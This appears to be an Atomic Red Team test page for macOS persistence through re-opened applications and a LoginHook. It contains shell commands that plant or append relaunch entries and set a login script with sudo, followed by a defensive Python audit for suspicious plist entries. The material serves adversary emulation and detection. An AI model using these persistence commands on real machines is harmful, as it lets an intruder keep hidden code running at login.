Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named `com.apple.loginwindow.[UUID].plist` within the `~/Library/Preferences/ByHost` directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user's next logon. Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the `com.apple.loginwindow.[UUID].plist` file to execute payloads when a user logs in.
## Atomic Tests

- Atomic Test #1 - Copy in loginwindow.plist for Re-Opened Applications
- Atomic Test #2 - Mac Defaults
- Atomic Test #3 - Append to existing loginwindow for Re-Opened Applications

## Atomic Test #1 - Copy in loginwindow.plist for Re-Opened Applications

Copy in new loginwindow.plist to launch Calculator.

Supported Platforms: macOS

auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| calc_plist_path | path to binary plist with entry to open calculator | path | PathToAtomicsFolder/T1547.007/src/reopen_loginwindow_calc.plist |

Attack Commands: Run with `sh`!

```sh
cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
```

Cleanup Commands:

```sh
rm -f ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
```
## Atomic Test #2 - Mac Defaults

Supported Platforms: macOS

auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script | path to script | path | /path/to/script |

Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

```sh
sudo defaults write com.apple.loginwindow LoginHook #{script}
```

Cleanup Commands:

```sh
sudo defaults delete com.apple.loginwindow LoginHook
```
## Atomic Test #3 - Append to existing loginwindow for Re-Opened Applications

Appends an entry that launches Calculator hidden to the existing loginwindow.*.plist for the next login. Note that the change may not result in the added Calculator program launching on the next user login; whether it does may depend on which version of macOS you are running.
Supported Platforms: macOS

auto_generated_guid: 766b6c3c-9353-4033-8b7e-38b309fa3a93

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| objc_source_path | path to objective C program | path | PathToAtomicsFolder/T1547.007/src/append_reopen_loginwindow.m |
| exe_path | path to compiled program | path | /tmp/t1547007_append_exe |

Attack Commands: Run with `sh`!

```sh
# locate the per-host loginwindow plist (the UUID part of the name varies per machine)
FILE=$(find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1)
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo "save backup copy to /tmp/"
cp "${FILE}" /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p "${FILE}"
echo overwriting...
# the compiled Objective-C helper appends the Calculator entry to the plist
"#{exe_path}" "${FILE}" && echo after && plutil -p "${FILE}"
```

Cleanup Commands:

```sh
rm -f "#{exe_path}"
# revert to backup copy
FILE=$(find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1)
if [ -z "${FILE}" ] ; then
  exit 0
fi
mv /tmp/t1547007_loginwindow-backup.plist "${FILE}"
```

Dependencies: Run with `bash`!

Check Prereq Commands:

```bash
if [ -f "#{exe_path}" ]; then exit 0 ; else exit 1; fi
```

Get Prereq Commands:

```bash
cc "#{objc_source_path}" -o "#{exe_path}" -framework Cocoa
```
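The file these tests write is also the file a defender audits after running them. The following Python is an added example, not code from the Atomic Red Team project: it parses a constructed loginwindow plist and flags relaunch entries that point outside the standard application directories or are set to launch hidden. The layout (a `TALAppsToRelaunchAtLogin` array of dicts with `BundleID`, `Path` and `Hide` keys) is assumed to match what macOS writes; the paths in the sample are made up.

```python
import plistlib
from pathlib import Path

# Constructed sample in the assumed layout of
# ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist (made-up paths).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>TALAppsToRelaunchAtLogin</key><array>
<dict><key>BackgroundState</key><integer>2</integer>
<key>BundleID</key><string>com.apple.Safari</string>
<key>Hide</key><false/>
<key>Path</key><string>/Applications/Safari.app</string></dict>
<dict><key>BackgroundState</key><integer>2</integer>
<key>BundleID</key><string>com.apple.calculator</string>
<key>Hide</key><true/>
<key>Path</key><string>/tmp/Calculator.app</string></dict>
</array></dict></plist>
"""

# Relaunch entries pointing anywhere else deserve a closer look.
TRUSTED_PREFIXES = ("/Applications/", "/System/Applications/")

def suspicious_relaunch_entries(plist_bytes):
    """Return (bundle_id, path, reasons) for relaunch-at-login entries that live
    outside the trusted app directories or are flagged to launch hidden.
    plistlib auto-detects XML and binary plists, so both forms are handled."""
    data = plistlib.loads(plist_bytes)
    findings = []
    for entry in data.get("TALAppsToRelaunchAtLogin", []):
        path = entry.get("Path", "")
        reasons = []
        if not path.startswith(TRUSTED_PREFIXES):
            reasons.append("path outside trusted application directories")
        if entry.get("Hide"):
            reasons.append("Hide set: relaunches without a visible window")
        if reasons:
            findings.append((entry.get("BundleID", "?"), path, reasons))
    return findings

def audit_byhost_dir(byhost_dir):
    """Run the check over every loginwindow plist in a ByHost directory
    (normally ~/Library/Preferences/ByHost); returns {file: findings}."""
    return {str(f): suspicious_relaunch_entries(f.read_bytes())
            for f in Path(byhost_dir).glob("com.apple.loginwindow.*.plist")}

if __name__ == "__main__":
    for bundle, path, reasons in suspicious_relaunch_entries(SAMPLE_PLIST):
        print(f"{bundle} ({path}): {'; '.join(reasons)}")
```

The LoginHook written by Atomic Test #2 lives in a different plist (`com.apple.loginwindow` without the UUID) and is checked with `defaults read com.apple.loginwindow LoginHook`, which should normally report that the key does not exist.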